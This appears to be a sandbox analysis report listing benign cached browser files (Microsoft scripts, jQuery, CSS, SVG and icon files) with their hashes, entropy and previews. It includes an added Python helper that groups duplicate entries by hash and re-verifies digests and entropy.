Preview: R...F...._..".)..2..#.\IDj*..z"..*%..#.M........<!....w.$.?.<3'...\.......5$6)O.2.r.K7............s..p...c@.)8.B.9i..<.].....v....:}.....ej.N..c..G.2.4W..0Z..!../[email protected]?.....B8-..&..t%....<TB..N.........IQ...R.....L....>.y..{E:0lB+NA.3aF.......#|..!..9..\;....M....[0XI...2.Y.8.K.E...K.-.....?.t>...!%$.Q.......b<...\K#.......DK.....mS...[...<.....".I....W..$."...)..wh..Cr.ch...+.....Cc.n..6....-T.r.{[email protected] .g..q.P.pW..'.9.*..|!.A.n...D<.....h9p......*..l..I....o<.6....x.1....6..F..ce.*a]..B.5..d0..fP..6"..|v.ff^.=.,./..@..=...D.. .././v....$f[..?....p .G.S.......d.n.%.[...-&.*.E..j.-..G....f.....Y.Q.n...`.;..U.L......{\5@\.I..F....".Bv.m......H.X.......~. ...Y.....[.r.$L...7.B6...+-.3!..aZkh...}.n.9...e.7..F..F"....~.......QH}..)E../d.Z..X...%....Y.I5l8_..."b....,q.pd.........].#?.qmy...........*..v64...)j..6.\..%.$....E]..`.....z..J....F.m$Y.....6.....p.,,....|....R&L]..WB.q..<.|>.uN..MR.87

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\lwsignupheaderjs_4NYTMbxtFAmu44aIr74B-Q2[1].js

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines

Size (bytes): 5842

Entropy (8bit): 5.270910508242207

Encrypted: false

MD5: F63DE116518C387CE1B74E2AFEDF1D39

SHA1: E62100D00AC32F5C078E49CB1E3E744310FBEE9C

SHA-256: 2D61BD15CBF2528D2CECB823946C092DDA370E2D41EE68A888E0323E1DAFDF7A

SHA-512: 40FBF92B222C41ABC52D58DA755E2C43673DA501228FD61E1EB0267FFB8930BDBD1355E7527D6FBCEA8971CED999A04BF89727AB1758961B7FFD06490CE8B759

Malicious: false

Preview: function registerNamespace(){for(var e=arguments.length,t=0;e>t;t++){for(var r=this,o=arguments[t].split("."),n=o.length,a=0;n>a;a++){var i=o[a];r[i]||(r[i]=function(){}),r=r[i]}}}!function(){function e(e,o,n,a,i){var s=this,f=null,l=null,c=!1;try{f=t.external}catch(u){}try{l=t.webkit&&t.webkit.messageHandlers||null,c=null!==l}catch(u){}s.getPropertyBag=function(){if(a){if(i&&"undefined"!=typeof Storage&&"undefined"!=typeof JSON&&sessionStorage.property){return JSON.parse(sessionStorage.property)}var e=s.getCookieValue("Property");.if(e&&"undefined"!=typeof JSON){return JSON.parse(e)}}return null},s.getProperty=function(e){var t=null;try{t=f.Property(e)}catch(r){if(a){var o=s.getPropertyBag();o&&(t=o[e],t="string"==typeof t?decodeURIComponent(t):t)}}return t},s.setWizardButtons=function(t,r,o){try{if(!e){if(c){var n={"IsBackEnabled":t,"IsNextEnabled":r,"IsLastPage":o};l.SetWizardButtons.postMessage(JSON.stringify(n))}else{f.SetWizardButtons(t,r,o)}}}catch(i){a&&(s.setCookieValue("Page"

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2[1].svg

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: SVG Scalable Vector Graphics image

Size (bytes): 3651

Entropy (8bit): 4.094801914706141

Encrypted: false

MD5: EE5C8D9FB6248C938FD0DC19370E90BD

SHA1: D01A22720918B781338B5BBF9202B241A5F99EE4

SHA-256: 04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A

SHA-512: C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58

Malicious: false

Preview: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\print-icon[1].png

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: PNG image data, 16 x 16, 8-bit/color RGB, non-interlaced

Size (bytes): 173

Entropy (8bit): 5.970149697517944

Encrypted: false

MD5: 023F5AC6E0114AF1F781BE5D3C956385

SHA1: C166284B8541F1DE32DC5C4DEC635C296BF85C98

SHA-256: 75D637BF6B6DFF2525095D0BE7E0C90F012BB118C2EF19099AFDCBC630ADFC79

SHA-512: DAFA49056E3D3014DB392410685CC05773C09938E2E700657727928EDCFF8EA2D7C769D377539C52DA70321B94F4E8F045F565EC51BC2B701D95BB3213CC2203

Malicious: false

Preview: .PNG........IHDR...............h6....tEXtSoftware.Adobe ImageReadyq.e<...OIDATx.b...?..0222`..jX..a5...D0.50.......k......:...X=....'..(..I.....K........ .........IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\script[1].js

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines, with no line terminators

Size (bytes): 28228

Entropy (8bit): 5.328001992404352

Encrypted: false

MD5: 62CAEEAADDE772430F6D4C6BFB57D631

SHA1: 4F599DC9B764720A6E85E06BA228595DB0959AC4

SHA-256: E2AFDBAAE33821CC0792E905C5F3BDB1EB49789C66803C39B1028FF566C765E9

SHA-512: DF5E00BE2C96EA361336C4BA529A7C288FBA65FD6ED0832DEF15CBB3989307AF7C24ED6FD4EA591E885932A7A7F947056E7116D942A3D15B6ABA8F346E534B8F

Malicious: false

Preview: function ShowSelectedComponentKeyPress(n,t){if(window.event.keyCode==13)return ShowSelectedComponent(n,t),!1}function SetRightSideNavigationMenuHeight(){$("[id^=dvModuleGroup_]").hide();window.location.search.toLowerCase().indexOf("bookmarkid")!=-1&&SelectBookMark();window.location.search.toLowerCase().indexOf("componentid")!=-1&&LoadSelectedInternalLink();$(".div_side_comp").length>0&&$(".div_content").css("min-height",$(".div_side_comp").height()-27)}function ShowSelectedComponent(n,t){var i=$("#"+t).attr("data-parentModule");return i!=undefined&&i!=null&&($("[data-parentmodule="+i+"]").show(),$("#"+i+" [id$=_LongDescription]").length>0?(document.getElementById(i+"_LongDescription").style.display="block",document.getElementById(i+"_ShortDescription").style.display="none",ShowText($("#"+i+".learnMoreLabel"),"long")):ShowText($("#"+i+".learnMoreLabel"),"long"),DisplayTopNavigation(i)),$("html, body").animate({scrollTop:$("#"+t).offset().top-1},800),!1}function ShowToolTip(){var n,i,t;w

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\18-d72213[1].js

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode text, with very long lines

Size (bytes): 128007

Entropy (8bit): 5.225176216325186

Encrypted: false

MD5: 59AD05CBCCE6803FB00314310F20FC45

SHA1: F7A094F6E0E60CD5C5B20D10788AF8A8F71CFEFF

SHA-256: 55AFD02F9CA1FE1B8D3705EF8EBA7C9A8E2F0BA4B8D1AB8853A2A10FAE9E4AC8

SHA-512: 7EDCE6C4078519C8E623B5CC32F47E8033E400673F17BEDBF59A8C6DAB551705E2C33000D158CAB2C7EB164281D6C5980B81FE0F297B38AF05061F086C121D09

Malicious: false

Preview: (function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\51-6d3a1e[1].css

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode text, with very long lines

Size (bytes): 163522

Entropy (8bit): 5.050717299586406

Encrypted: false

MD5: 6178D19989D7964964A1CC7BED82F341

SHA1: 8B0DBA5CCCCFAC4ED390F900F85B275A5507215A

SHA-256: 3ABC05CF7FCD206115A9F2871547BE6A8649C34B2EFC0D1F77441147A5A78BC8

SHA-512: 120F92E7C4F785EADC0B000F0035E475977ECAAA4131500E3D2EE3C4CE9D1A368DB3C07D16BEB58DE46AD2F6857503A3445DFE06BEA23F59646424FFA1946F81

Malicious: false

Preview: @charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c[1].svg

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: SVG Scalable Vector Graphics image

Size (bytes): 2100

Entropy (8bit): 4.112944982261013

Encrypted: false

MD5: 747A513A54BAA645775E49D4C52696D4

SHA1: D24769327CA348064544DDC259726EFBEC3DAE36

SHA-256: DFCBA2DC365A99E7DEDAEFAEE7171282F9F6AC2B928B4E99060925EE6E129BA4

SHA-512: C17A9065E6F307E4E45D5C422FE42E75F12DDA916715E7A927FF2DB9F6677249DA4B2545772594051AE2B93A47D61BC6356DE5412C9213C33C04BF018CA88509

Malicious: false

Preview: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#777777" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.107,0,0,1-.446.089A1.107,1.107,0,0,1,.7,9.054a1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893A1.164,1.164,0,0,1,.7,6.946a1.107,1.107,0,0,1,.446-.089M8,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,8,6.857m6.857,0a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,14.857,6.857Z"/></svg><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><t

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\favicon[1].ico

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors

Size (bytes): 17174

Entropy (8bit): 2.9129715116732746

Encrypted: false

MD5: 12E3DAC858061D088023B2BD48E2FA96

SHA1: E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5

SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21

SHA-512: C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01

Malicious: false

Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\favicon[2].ico

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors

Size (bytes): 17174

Entropy (8bit): 2.9129715116732746

Encrypted: false

MD5: 12E3DAC858061D088023B2BD48E2FA96

SHA1: E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5

SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21

SHA-512: C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01

Malicious: false

Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\favicon_a_eupayfgghqiai7k9sol6lg2[1].ico

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors

Size (bytes): 17174

Entropy (8bit): 2.9129715116732746

Encrypted: false

MD5: 12E3DAC858061D088023B2BD48E2FA96

SHA1: E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5

SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21

SHA-512: C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01

Malicious: false

Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
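The favicon cached as VINVDFP6\favicon[1].ico, VTIIBVU5\favicon[1].ico, VTIIBVU5\favicon[2].ico and VTIIBVU5\favicon_a_eupayfgghqiai7k9sol6lg2[1].ico is one artefact listed four times: same size, same entropy and identical MD5/SHA1/SHA-256/SHA-512. When a dropped-files list runs to dozens of entries, an analyst wants to collapse such repeats and to re-check the report's numbers against the bytes actually recovered from the sandbox. The script below is an added example and is not part of the Joe Sandbox report: it parses records in the flattened "Key: value" layout shown on this page, groups them by SHA-256, and recomputes size, digests and entropy for a file. The excerpt it ships with is a constructed subset of the records above (four entries, trimmed to the fields the parser needs). "Entropy (8bit)" is assumed to be byte-wise Shannon entropy in bits per byte, which is what its 8.0 maximum implies; the report's own threshold for the "Encrypted" flag is not stated here and is not reproduced.

```python
"""Triage helper for the dropped-file records above (added example, not the
sandbox's own code): parse the flattened report layout, collapse duplicates by
hash, and re-verify a record against bytes pulled from the sandbox."""
import hashlib
import math
import re
from collections import Counter, defaultdict

# Constructed excerpt: four records copied from this page in the extracted
# "Key: value" layout, including the fused "...icoProcess: ..." path lines.
REPORT_EXCERPT = r"""
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\favicon[1].icoProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Size (bytes): 17174
Entropy (8bit): 2.9129715116732746
MD5: 12E3DAC858061D088023B2BD48E2FA96
SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
Malicious: false

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\favicon[2].icoProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Size (bytes): 17174
MD5: 12E3DAC858061D088023B2BD48E2FA96
SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\favicon_a_eupayfgghqiai7k9sol6lg2[1].ico
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Size (bytes): 17174
SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\icons[1].eotProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Size (bytes): 18519
Entropy (8bit): 7.668180326917825
MD5: C443B409CE8632A587760F940862748F
SHA-256: 39C39A6744CF958E497D3D0A2120F4A7BC0124359231C39E4EDF2387146B0F05
"""

# A record starts with a drive-letter path; the extractor sometimes glues the
# "Process:" field onto the same line, so capture it optionally.
PATH_RE = re.compile(r"^([A-Za-z]:\\.*?)(?:Process:\s*(.*))?$")
KNOWN_FIELDS = {"Process", "File Type", "Size (bytes)", "Entropy (8bit)",
                "Encrypted", "MD5", "SHA1", "SHA-256", "SHA-512",
                "Malicious", "Preview"}


def parse_records(text):
    """Turn the flattened report text into a list of dicts, one per file."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = PATH_RE.match(line)
        if m:
            current = {"path": m.group(1)}
            if m.group(2):
                current["Process"] = m.group(2)
            records.append(current)
        elif current is not None and ": " in line:
            key, value = line.split(": ", 1)
            if key in KNOWN_FIELDS:       # skips footers and page headers
                current[key] = value
    return records


def group_by_hash(records, field="SHA-256"):
    """Map each digest to the cache paths that carry it (duplicates collapse)."""
    groups = defaultdict(list)
    for rec in records:
        if field in rec:
            groups[rec[field]].append(rec["path"])
    return dict(groups)


def shannon_entropy(data):
    """Byte-wise Shannon entropy in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def digests(data):
    """Digests in the report's own field names and upper-case hex spelling."""
    return {"MD5": hashlib.md5(data).hexdigest().upper(),
            "SHA1": hashlib.sha1(data).hexdigest().upper(),
            "SHA-256": hashlib.sha256(data).hexdigest().upper(),
            "SHA-512": hashlib.sha512(data).hexdigest().upper()}


def verify(record, data):
    """Return the report fields that disagree with the bytes actually on disk."""
    bad = [f for f, v in digests(data).items()
           if f in record and record[f].upper() != v]
    if "Size (bytes)" in record and int(record["Size (bytes)"]) != len(data):
        bad.append("Size (bytes)")
    if "Entropy (8bit)" in record and \
            abs(float(record["Entropy (8bit)"]) - shannon_entropy(data)) > 1e-6:
        bad.append("Entropy (8bit)")
    return bad


if __name__ == "__main__":
    for digest, paths in group_by_hash(parse_records(REPORT_EXCERPT)).items():
        print(f"{digest[:16]}...  seen {len(paths)}x")
        for p in paths:
            print("   ", p)
```

Run as-is it prints two groups, the favicon one with three paths. To check a file exported from the sandbox, feed its bytes and the matching record to verify(); an empty list means size, all four digests and entropy agree with what the report printed.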

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\httpErrorPagesScripts[1]

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators

Size (bytes): 12105

Entropy (8bit): 5.451485481468043

Encrypted: false

MD5: 9234071287E637F85D721463C488704C

SHA1: CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152

SHA-256: 65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649

SHA-512: 87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384

Malicious: false

Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\jquery-1.7.2.min[1].js

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: HTML document, UTF-8 Unicode text, with very long lines

Size (bytes): 98400

Entropy (8bit): 5.372216343161422

Encrypted: false

MD5: C209DB8CCA8078D9F5EA3FFFC8DCBB5B

SHA1: 8F147E9F86789327CE0FC5DBB3DA27EE2E81651D

SHA-256: FDBBCC3C415BAA641E0A84E29A8E18FF9A0923458FFFED63D1AD143DCDF1AFE9

SHA-512: 34A265D2F1FC153C5A718E3871EC9F2ECCA2FEC19338DD8BFFE99D040EE975A1CDC14C9E32CB182C2E6BB9378AA379DAD9CB90BB533E663FA27B3B45C2F9DFF2

Malicious: false

Preview: /*! jQuery v1.7.2 jquery.com | jquery.org/license */.(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write((f.support.boxModel?"<!doctype html>":"")+"<html><body>"),cl.close();d=cl.createElement(a),cl.body.appendChild(d),e=f.css(d,"display"),b.removeChild(ck)}cj[a]=e}return cj[a]}function ct(a,b){var c={};f.each(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}function cs(){cq=b}function cr(){setTimeout(cs,0);return cq=f.now()}function ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTyp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd[1].svg

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: SVG Scalable Vector Graphics image

Size (bytes): 3651

Entropy (8bit): 4.094801914706141

Encrypted: false

MD5: EE5C8D9FB6248C938FD0DC19370E90BD

SHA1: D01A22720918B781338B5BBF9202B241A5F99EE4

SHA-256: 04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A

SHA-512: C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58

Malicious: false

Preview: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.


C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\mscc-0.4.1.min[1].css

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode text, with very long lines, with no line terminators

Size (bytes): 108912

Entropy (8bit): 5.29531094760475

Encrypted: false

MD5: 35B50546931869824B2001C18D22B6BC

SHA1: BAB73DE68AA3EB6450B896FB502F5F288B872F83

SHA-256: 4B4BBAFA87644E35C133E83F8916808C7FB4B1FAEB13DC9F16862FC41200A583

SHA-512: 8FE0085E6C052FB74DD12889BF69250765F1AEF1089B91796541C854FFB8AE778987E75BD2BC570B2408F58317A94ADB1A475B9C4BC080CF3DFE6D1C458C6198

Malicious: false

